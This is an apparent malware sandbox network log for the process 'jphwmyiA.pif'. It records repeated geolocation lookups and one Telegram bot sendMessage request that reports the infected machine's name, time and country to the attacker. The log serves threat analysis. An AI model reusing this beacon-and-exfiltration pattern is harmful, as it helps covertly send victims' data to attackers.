                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1716&rtt_var=660&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1637689&cwnd=227&unsent_bytes=0&cid=f1122c37c609f268&ts=138&x=0"
                                                                                                                                          2025-01-06 06:54:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          19192.168.2.553716188.114.97.34437820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:34 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-06 06:54:34 UTC859INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:34 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461263
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LLs3vZJM6kIetBporrwfa44AaDxkwGSLZTYh%2FBxfOOfSP%2BgiCn%2FOCkQxxy9%2BP74Hz1tSaZQ9vSWr2tVOrp6CualmVJ7lXPOgsfnLefoiFA6vgEKz6liObrFyDmfyNi%2BCdNApKCnF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc2a19360f39-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1717&rtt_var=652&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1667618&cwnd=249&unsent_bytes=0&cid=595234606d845870&ts=159&x=0"
                                                                                                                                          2025-01-06 06:54:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          20192.168.2.553718188.114.97.34438016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:34 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:34 UTC859INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:34 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461263
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7k51Qj41Rnd91QPmSPZpAioYkNN1fpzbE0svs%2FeUm78%2Fxsyey6sPvT8pk%2BvWEHkwZrY9Gd6HskRkHJmmpx5DmXeCwYpvoHkY5ZrfZqL4M%2F66LU89nTMJwrM9cKl0mlqH4bdotsz%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc2b4cc48c18-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1796&rtt_var=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1597374&cwnd=206&unsent_bytes=0&cid=6185d8b31e888703&ts=157&x=0"
                                                                                                                                          2025-01-06 06:54:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          21192.168.2.553730188.114.97.34437820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:35 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:36 UTC857INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:35 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461265
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qrCNOPm1hAhd3UGlOdE%2FYM0Bssg5GXNaD8S7Ci5XunYHTOAXhlnthX6SRBHwhkRqxNnfF05UYPy2k%2Btqg5l19K%2BgGwBVOrkyaswAydeXbFAsNKYleMMfiuiY7W4dN5DAM%2FWjn3Uz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc32bcf77d02-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1962&rtt_var=748&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1449851&cwnd=230&unsent_bytes=0&cid=087290e32b572354&ts=139&x=0"
                                                                                                                                          2025-01-06 06:54:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          22192.168.2.553731188.114.97.34438016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:36 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-06 06:54:36 UTC859INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:36 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461265
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LpobXGx74oNEEd0TvR9Abb4tiZPLMOdOjfulJEZUJ8Rtbqx%2FBiZGLvWB%2Fv2LL7cqkFR86OzcLR%2Fz5XziiTGTD7Y5iw6RVeYyz7gENVvU9FZJN%2B3Hu4WwJ8HsXh2E%2FoA7JAez4j2e"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc342e4742c8-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1733&min_rtt=1732&rtt_var=653&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1672394&cwnd=225&unsent_bytes=0&cid=deb32eb59412121b&ts=150&x=0"
                                                                                                                                          2025-01-06 06:54:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          23192.168.2.553734149.154.167.2204437820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:36 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:18:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                          Host: api.telegram.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:36 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:36 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 55
                                                                                                                                          Connection: close
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                          2025-01-06 06:54:36 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          24192.168.2.553744188.114.97.34438016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:37 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:37 UTC857INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:37 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461266
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U6p5vjyGq7azh%2F2DBFZXzXSzJ2RH858HQenkf%2BwnTdUFJGhWOWsBveYWbp249cuMkVATNa7U3a8wZcVtXYDBSgndEcqf07%2F0Ose%2BLEPgxfovAvpKzFLzvkMR8Llu4GodBFZywh1A"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc3cfb2c4251-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1673&rtt_var=670&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1745367&cwnd=248&unsent_bytes=0&cid=feebd3ea2ac23dbe&ts=142&x=0"
                                                                                                                                          2025-01-06 06:54:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          25192.168.2.553756188.114.97.34438016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:38 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:39 UTC859INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:39 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461268
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wH2Z8pmvX5OoF8p9DWGHLkiZbHNz%2BDlnv2ja8il%2BYcC%2B8fby2zRWb9vPgyeleuYLyGNM8N8EQzVJUzt%2BIp27vOR0A7mD1RMo6ItZVt%2BPAqBD9F1d2E6MsIIbdUVMw1YyUruh6GyO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc461be1f5f6-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1917&min_rtt=1728&rtt_var=783&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1689814&cwnd=183&unsent_bytes=0&cid=f3e86d2c83e8359c&ts=159&x=0"
                                                                                                                                          2025-01-06 06:54:39 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          26192.168.2.553765188.114.97.34438016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:40 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:40 UTC859INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:40 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461269
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wAGFjnigq4h96PEHyn3P4zfl9ERUX%2BNdohUj7jj4UYjsaHnZiL6j6%2FSJhneeHbUWqEhXvc%2BAwqT0uaastaefh09vUF8czWR90Jh%2B%2FoC8YRGAX6Z5nY3lTN2ub1lMZnKjBWJb77lz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc4fbea20f8b-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1466&rtt_var=601&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1746411&cwnd=237&unsent_bytes=0&cid=e17bff394173b75d&ts=287&x=0"
                                                                                                                                          2025-01-06 06:54:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          27192.168.2.553779188.114.97.34438016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:41 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:42 UTC855INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:42 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461271
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OtcwuwTBwCZsEmqSII829OD1JqC90AbTTYV%2F9R5SfmlpKpvyi7UhHSyxPbLZZl1sf%2BRwVIENwZjJzA5xHGZi5j5faNi25czo9H1cIP3GmPphtPMiceDvy9WsQmjtkSOF%2BrxTUCbP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc587ce08c7b-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1817&rtt_var=688&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1581798&cwnd=186&unsent_bytes=0&cid=a3e398f1ee5ee832&ts=146&x=0"
